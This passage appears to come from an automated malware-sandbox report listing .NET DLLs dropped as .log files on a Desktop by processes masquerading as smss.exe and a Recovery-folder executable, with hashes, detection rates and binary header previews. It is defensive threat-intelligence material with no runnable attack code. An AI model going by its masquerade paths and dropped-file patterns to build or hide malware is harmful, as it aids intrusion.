MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EErUokRe.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\JDNtgNEK.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JRLLnIaC.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OfbStevG.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\Rfxshdov.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\USBzXUek.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VlKreyqd.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZFTyARuY.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZTFIdpqp.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\blWilNVX.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gDHycgoN.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\kHvGrYKy.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lhCxVqkE.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\medFrqzz.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\npqXqOLK.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\oCwXyDAs.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\qmbOMItv.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rEjFTmFn.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\rfhNxLLD.log

Download File

Process:	C:\Program Files\Windows NT\smss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sXGeTWEn.log

Download File

Process:	C:\portsurrogateFontCrt\BlockcontainerWin.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ssnNFABl.log

Download File

Process:	C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
